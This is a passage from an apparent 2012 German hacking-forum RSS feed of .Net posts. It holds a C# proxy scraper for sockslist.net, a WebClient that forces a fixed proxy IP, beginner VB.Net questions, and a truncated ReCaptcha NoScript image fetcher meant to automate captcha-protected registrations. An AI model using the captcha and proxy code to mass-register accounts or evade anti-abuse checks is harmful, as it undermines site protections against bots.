#007700">(</span><span style="color: #0000BB">src</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"\\&lt;td&nbsp;class=\\\"t_ip\\\"&gt;(.*?)\\&lt;\\/td\\&gt;"</span><span style="color: #007700">).</span><span style="color: #0000BB">Groups</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">1</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Value</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;str3&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Regex</span><span style="color: #007700">.</span><span style="color: #0000BB">Match</span><span style="color: #007700">(</span><span style="color: #0000BB">src</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"\\&lt;td&nbsp;class=\\\"t_port\\\"&gt;(.*?)\\&lt;\\/td\\&gt;"</span><span style="color: #007700">).</span><span style="color: #0000BB">Groups</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">1</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Value</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Match&nbsp;str2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Regex</span><span style="color: #007700">.</span><span style="color: #0000BB">Match</span><span style="color: #007700">(</span><span style="color: #0000BB">str3</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"\\((.*?)\\^(.*?)\\^(.*?)\\)"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">String&nbsp;mv1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str2</span><span style="color: #007700">.</span><span style="color: #0000BB">Groups</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">1</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Value</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">String&nbsp;mv2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str2</span><span style="color: #007700">.</span><span style="color: #0000BB">Groups</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">2</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Value</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">String&nbsp;mv3&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str2</span><span style="color: #007700">.</span><span style="color: #0000BB">Groups</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">3</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Value</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">int&nbsp;mvi1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">mvi2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">mvi3&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">mvi1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">.</span><span style="color: #0000BB">Parse</span><span style="color: #007700">(</span><span style="color: #0000BB">mv1</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">mvi1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">mv1</span><span style="color: #007700">&#93;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">mvi2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">.</span><span style="color: #0000BB">Parse</span><span style="color: #007700">(</span><span style="color: #0000BB">mv2</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">mvi2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">mv2</span><span style="color: #007700">&#93;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">mvi3&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">.</span><span style="color: #0000BB">Parse</span><span style="color: #007700">(</span><span style="color: #0000BB">mv3</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">mvi3&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">mv3</span><span style="color: #007700">&#93;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">int&nbsp;port&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mvi1&nbsp;</span><span style="color: #007700">^&nbsp;</span><span style="color: #0000BB">mvi2&nbsp;</span><span style="color: #007700">^&nbsp;</span><span style="color: #0000BB">mvi3</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">gotProxy</span><span style="color: #007700">(new&nbsp;</span><span style="color: #0000BB">Server</span><span style="color: #007700">(</span><span style="color: #0000BB">host</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">port</span><span style="color: #007700">));<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">delegate&nbsp;void&nbsp;gotProxyEvent</span><span style="color: #007700">(</span><span style="color: #0000BB">Server&nbsp;proxy</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">event&nbsp;gotProxyEvent&nbsp;gotProxy</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">void&nbsp;getProxy</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WebClient&nbsp;client&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">WebClient</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">client</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadStringCompleted&nbsp;</span><span style="color: #007700">+=&nbsp;new&nbsp;</span><span style="color: #0000BB">DownloadStringCompletedEventHandler</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">newSocks</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">client</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadStringAsync</span><span style="color: #007700">(new&nbsp;</span><span style="color: #0000BB">Uri</span><span style="color: #007700">(</span><span style="color: #DD0000">"http://sockslist.net/"</span><span style="color: #007700">));<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;}<br />}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>[/HIDE]</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DeKaDeNz</dc:creator>
			<guid isPermaLink="true">net-94/c-proxyfinder-5668</guid>
		</item>
		<item>
			<title>VB.Net Forumlogin einbauen</title>
			<link>net-94/forumlogin-einbauen-5541?goto=newpost</link>
			<pubDate>Tue, 24 Jan 2012 17:56:07 GMT</pubDate>
			<description>Hi. 
 
Ein Login in sein Programm mit eigenen Daten einzubauen ist ja nicht schwer, aber wie kann man es machen das man im Forum angemeldet sein muss...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Ein Login in sein Programm mit eigenen Daten einzubauen ist ja nicht schwer, aber wie kann man es machen das man im Forum angemeldet sein muss und das Programm das dann überprüft?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/forumlogin-einbauen-5541</guid>
		</item>
		<item>
			<title>VB.Net Fehlermeldung beim Lied switchen</title>
			<link>net-94/fehlermeldung-beim-lied-switchen-5513?goto=newpost</link>
			<pubDate>Tue, 24 Jan 2012 14:35:03 GMT</pubDate>
			<description>Hi. 
 
Ich mache gerade einen Musikplayer, der sieht so aus: 
Bild: http://i42.tinypic.com/210k70o.png  
 
Die 2 Einträge sind jetzt nur Beispiele,...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Ich mache gerade einen Musikplayer, der sieht so aus:<br />
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://i42.tinypic.com/210k70o.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
Die 2 Einträge sind jetzt nur Beispiele, die richtigen Namen werden vom FTP ausgelesen.<br />
<br />
Den 1. Song kann ich ganz normal abspielen, wenn ich dann zu einem anderen Song (den 2ten) wechseln will, erhalte ich folgende Fehlermeldung:<br />
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://i42.tinypic.com/4q1qj6.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
Will das Programm endlich mal fertig haben, wie soll ich den verdammten Fehler beheben?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/fehlermeldung-beim-lied-switchen-5513</guid>
		</item>
		<item>
			<title>VB.Net .mp3-Dateien abspielen</title>
			<link>net-94/mp3-dateien-abspielen-5183?goto=newpost</link>
			<pubDate>Fri, 20 Jan 2012 14:27:41 GMT</pubDate>
			<description>Hallo. 
 
Ich habe 2 Fragen bezüglich VB 2010. 
 
1. Wie heißt so eine Box in VB 
wo mehrere Sachen drinnen stehen 
zum anklicken?: 
 
Anhang 3409...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich habe 2 Fragen bezüglich VB 2010.<br />
<br />
1. Wie heißt so eine Box in VB<br />
wo mehrere Sachen drinnen stehen<br />
zum anklicken?:<br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=3409&amp;d=1364919365" border="0" alt="Name:  mp3-liste.png
Hits: 609
Größe:  4,3 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
2. Falls das jemand mit der Box weiß, wie kann ich es<br />
anstellen das wenn ich eine Zeile anklicke eine bestimmte<br />
.mp3-Datei abgespielt wird? Und muss ich die ganzen .mp3-Dateien<br />
im Ordner wo ich das Programm habe am Ende auch haben?<br />
<br />
Oder kann ich es irgendwie machen das man halt die .exe hat<br />
ohne die ganzen einzelnen .mp3-Dateien.<br />
<br />
Mfg.</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=3409&amp;stc=1&amp;d=1364919378" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/mp3-dateien-abspielen-5183</guid>
		</item>
		<item>
			<title>C# Unfakeable WebClient</title>
			<link>net-94/unfakeable-webclient-4804?goto=newpost</link>
			<pubDate>Fri, 13 Jan 2012 16:55:18 GMT</pubDate>
			<description>Diese Klasse baut auf den WebClient auf. Der Client lässt sich nicht durch Proxy, Hosts oder DNS Einstellungen irittieren. Er erlaubt erst garkeine...</description>
			<content:encoded><![CDATA[<div>Diese Klasse baut auf den WebClient auf. Der Client lässt sich nicht durch Proxy, Hosts oder DNS Einstellungen irittieren. Er erlaubt erst garkeine Proxys und verbindet mit der IP im Konstruktor angegeben direkt ohne Umwege.<br />
Somit lassen sich die Ergebnisse auch mit Hosts Einträgen und manipulierten DNS-Servern nicht verfälschen.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;class&nbsp;</span><span style="color: #0000BB">SecuredWebClient&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">WebClient<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;ip</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">SecuredWebClient</span><span style="color: #007700">(</span><span style="color: #0000BB">String&nbsp;ip</span><span style="color: #007700">)&nbsp;:&nbsp;</span><span style="color: #0000BB">base</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">ip&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ip</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;protected&nbsp;</span><span style="color: #0000BB">override&nbsp;WebRequest&nbsp;GetWebRequest</span><span style="color: #007700">(</span><span style="color: #0000BB">Uri&nbsp;address</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WebRequest&nbsp;ori&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">base</span><span style="color: #007700">.</span><span style="color: #0000BB">GetWebRequest</span><span style="color: #007700">(</span><span style="color: #0000BB">address</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(</span><span style="color: #0000BB">ip</span><span style="color: #007700">!=</span><span style="color: #DD0000">""</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">ori</span><span style="color: #007700">.</span><span style="color: #0000BB">Proxy&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">WebProxy</span><span style="color: #007700">(</span><span style="color: #0000BB">ip</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;</span><span style="color: #0000BB">ori</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div><br />
Nutzung:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">SecuredWebClient&nbsp;WC&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">SecuredWebClient</span><span style="color: #007700">(</span><span style="color: #DD0000">"109.163.226.61"</span><span style="color: #007700">);<br />&nbsp;</span><span style="color: #0000BB">MessageBox</span><span style="color: #007700">.</span><span style="color: #0000BB">Show</span><span style="color: #007700">(</span><span style="color: #0000BB">WC</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadString</span><span style="color: #007700">(</span><span style="color: #DD0000">"http://knc.u-hacks.net/essentials.php"</span><span style="color: #007700">));&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DeKaDeNz</dc:creator>
			<guid isPermaLink="true">net-94/unfakeable-webclient-4804</guid>
		</item>
		<item>
			<title><![CDATA[[C#] Google ReCaptcha Bild auslesen]]></title>
			<link>net-94/c-google-recaptcha-bild-auslesen-4737?goto=newpost</link>
			<pubDate>Thu, 12 Jan 2012 17:47:57 GMT</pubDate>
			<description>Guten Tag, 
 
die folgende Klasse ermöglicht es, ReCaptchas von Google in C# zu bearbeiten. Damit ist es möglich, HTTP-Requests zu senden, welche die...</description>
			<content:encoded><![CDATA[<div>Guten Tag,<br />
<br />
die folgende Klasse ermöglicht es, ReCaptchas von Google in C# zu bearbeiten. Damit ist es möglich, HTTP-Requests zu senden, welche die Eingabe eines ReCaptchas erfordern (z.B. bei Registrierungsseiten wie auch Knuddels es verwendet). <br />
<br />
<b>Funktionsweise</b><br />
<br />
Wird ein ReCaptcha ausgefüllt, sendet das Script an die Seite einen Key der recaptcha_challenge_field genannt wird. Mithilfe dieses Keys kann über Google geprüft werden, ob das Captcha korrekt eingegeben wurde oder nicht. <br />
Google hat sich gegen das automatische auslesen der Captchas geschützt, um das manschinelle auslesen zu erschweren. <br />
<br />
Ich nutze hierbei die NoScript-Option von ReCaptcha. Diese ist in der Regel bei jedem ReCaptcha vorhanden. Die normalen ReCaptchas arbeiten mit Javascript, daher stellt Google mit der NoScript-Option die Möglichkeit zur Verfügung, das Captcha ohne JS zu lösen.<br />
<br />
<a href="https://u-labs.de/forum/attachment.php?attachmentid=3411&amp;d=1364919416" id="attachment3411" rel="Lightbox_0" ><img src="https://u-labs.de/forum/attachment.php?attachmentid=3411&amp;d=1364919416&amp;thumb=1" border="0" alt="Klicke auf die Grafik für eine größere Ansicht&nbsp;

Name:	recaptcha-nojs.jpg&nbsp;
Hits:	352&nbsp;
Größe:	38,1 KB&nbsp;
ID:	3411" class="thumbnail" style="float:CONFIG" /></a><br />
<br />
Als Antwort erhält man dann das recaptcha_challenge_field.<br />
<br />
<b>Benutzung</b><br />
<br />
Ihr müsst den Quelltext der Seite haben, auf der sich das zu ladende Captcha befindet. Dort findet ihr einen Link wie <br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">http://api.recaptcha.net/noscript?k=6LcU3AgAAAAAADsejah-kBvVVTQa6UjSAocMAlz_</code><hr />
</div>Der Parameter k ist das benötigte NoScript Feld. Dieses müsst ihr beim initialisieren der Klasse als Parameter übergeben. <br />
<br />
Über die Funktion<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
public string GetNoScriptField(string src);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script>kann das Feld durch Übergabe des Quelltextes ausgelesen werden.<br />
<br />
Anschließend kann das Captcha-Bild als Image-Objekt über der Eigenschaft<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
public Image CaptchaImage;<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script>abgerufen und Beispielsweise in einer PictureBox geladen werden. <br />
<br />
Das recaptcha_challenge_field erhält man über die Eigenschaft<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
public string ChallengeField;<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script>Beispielaufruf:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
ReCaptchaViewer captchaViewer = new ReCaptchaViewer(&quot;6LcU3AgAAAAAADsejah-kBvVVTQa6UjSAocMAlz_&quot;);<br />
// Captcha in PictureBox laden<br />
pbCaptcha.Image = captchaViewer.CaptchaImage;<br />
// recaptcha_challenge_field in TextBox laden<br />
tbChallengeField.Text = captchaViewer.ChallengeField;<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=3412&amp;d=1364919436" border="0" alt="Name:  recaptchaviewer.jpg
Hits: 407
Größe:  27,7 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<b>ReCaptchaViewer Klasse</b><br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text;<br />
using System.Net;<br />
using System.IO;<br />
using System.Text.RegularExpressions;<br />
using System.Web;<br />
using System.Drawing;<br />
<br />
class ReCaptchaViewer {<br />
    CookieContainer cookies = new CookieContainer();<br />
    Image captchaImage = null;<br />
    string challengeField = string.Empty;<br />
<br />
    public ReCaptchaViewer(string noScript) {<br />
        GetCaptchaImage(noScript);<br />
    }<br />
<br />
    public Image CaptchaImage {<br />
        get { return captchaImage; }<br />
    }<br />
<br />
    public string ChallengeField {<br />
        get { return challengeField; }<br />
    }<br />
<br />
    private void GetCaptchaImage(string noScript) {<br />
        HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(&quot;http://www.google.com/recaptcha/api/noscript?k=&quot; + noScript);<br />
        req.CookieContainer = cookies;<br />
        string src = new StreamReader(req.GetResponse().GetResponseStream()).ReadToEnd();<br />
<br />
        challengeField = new Regex(&quot;id=\&quot;recaptcha_challenge_field\&quot; value=\&quot;(&#91;^\&quot;&#93;+)\&quot;&gt;&quot;).Match(src).Groups&#91;1&#93;.Value;<br />
<br />
        string imageLocation = Regex.Match(src, &quot;src=\&quot;(&#91;^\&quot;&#93;+)\&quot;&quot;).Groups&#91;1&#93;.Value;<br />
        req = (HttpWebRequest)HttpWebRequest.Create(&quot;http://www.google.com/recaptcha/api/&quot; + imageLocation);<br />
